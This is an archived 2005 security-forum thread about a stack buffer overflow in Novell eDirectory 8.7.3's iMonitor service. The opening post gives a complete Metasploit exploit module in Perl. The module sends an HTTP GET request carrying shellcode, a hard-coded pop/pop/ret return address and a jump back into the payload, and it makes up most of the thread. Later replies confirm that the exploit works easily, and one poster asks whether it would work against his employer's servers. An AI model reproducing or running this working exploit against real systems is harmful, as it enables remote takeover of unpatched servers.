Novell Edirectory Imonitor Remote Buffer Overflow

Help - Search - Member List - Calendar

Full Version: Novell Edirectory Imonitor Remote Buffer Overflow

GovernmentSecurity.org > System Security > Exploit Research & Discussion

Rafter

Aug 15 2005, 06:53 PM

Strange that nobody apart from gcred11 talked about it so far...
too busy with the PnP exploit ?

The advisory can be found there :
http://www.frsirt.com/english/advisories/2005/1403

The exploit code is for Metasploit, so please kiddies don't ask for a compiled version !!!

CODE

package Msf::Exploit::edirectory_imonitor;
use strict;
use base "Msf::Exploit";
use Pex::Text;

my $advanced = { };

my $info =
{
'Name' => 'eDirectory 8.7.3 iMonitor Remote Stack Overflow',
'Version' => '$Revision: 1.1 $',
'Authors' =>
[
'Anonymous',
],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'winxp', 'win2k', 'win2003' ],
'Priv' => 1,

'AutoOpts' =>
{
'EXITFUNC' => 'thread'
},

'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 8008 ],
'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
'SSL' => [0, 'BOOL', 'Use SSL'],
},

'Payload' =>
{
'Space' => 0x1036,
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\$%",
'Keys' => ['+ws2ord'],
},

'Description' => Pex::Text::Freeform(qq{
This module exploits a stack overflow in eDirectory 8.7.3 iMonitor
service.
}),

'Refs' =>
[
['BID', 14548],
],

'Targets' =>
[
[ 'Windows (all versions) - eDirectory 8.7.3 iMonitor', 0x63501f15] # pop/pop/ret
],

'Keys' => ['imonitor'],
};

sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}

sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];

$self->PrintLine( "[*] Attempting to exploit " . $target->[0] );

my $s = Msf::Socket::Tcp->new(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'SSL' => $self->GetVar('SSL'),
);

if ( $s->IsError ) {
$self->PrintLine( '[*] Error creating socket: ' . $s->GetError );
return;
}

# pop/pop/ret in ndsimon.dlm on our jump to our shellcode
my $req = $shellcode . "\x90\x90\xeb\x04" . pack('V', $target->[1]) .
"\xe9\xbd\xef\xff\xff" . ("B" x 0xD0);
my $request =
"GET /nds/$req HTTP/1.1\r\n".
"Accept: */*\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n".
"Host: $target_host:$target_port\r\n".
"Connection: Close\r\n".
"\r\n";

$s->Send($request);

$self->PrintLine("[*] Overflow request sent, sleeping for four seconds");
select(undef, undef, undef, 4);

$self->Handler($s);
return;
}

1;

I don't have any eDirectory running in my local environment, but as I'm a curious guy does anybody has already tested it and could give some feedback ?

Thanks in advance

BuzzDee

Aug 15 2005, 07:29 PM

of course it worx very fine. one of the easiest hole to exploit i've seen so far lol...
really pisses me off that i didn't find that bug myself. looked at the software a few weeks ago... :/

IcedOut3E

Aug 15 2005, 08:56 PM

I noticed in the advisory that it said:

* Affected Products *

Novell eDirectory 8.7.3 for Windows 2000
Novell eDirectory 8.7.3 for Windows NT

Does anyone know if it is strictly these OS's or if this exploit will work for linux boxes as well. Reason I ask is that the place I work for runs eDirectory but its not on a windows box.

Thanks.

EDIT: Just read the source and answered my own question...lol. Sorry. Admins can delete this post if needed.

Erra

Aug 15 2005, 09:48 PM

Funny, I was just talking to someone over the course of the last week or two who was asking me if people still even used Novell products.

Its not widely used over where I am from. But I know it is out there. Interesting code too.

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.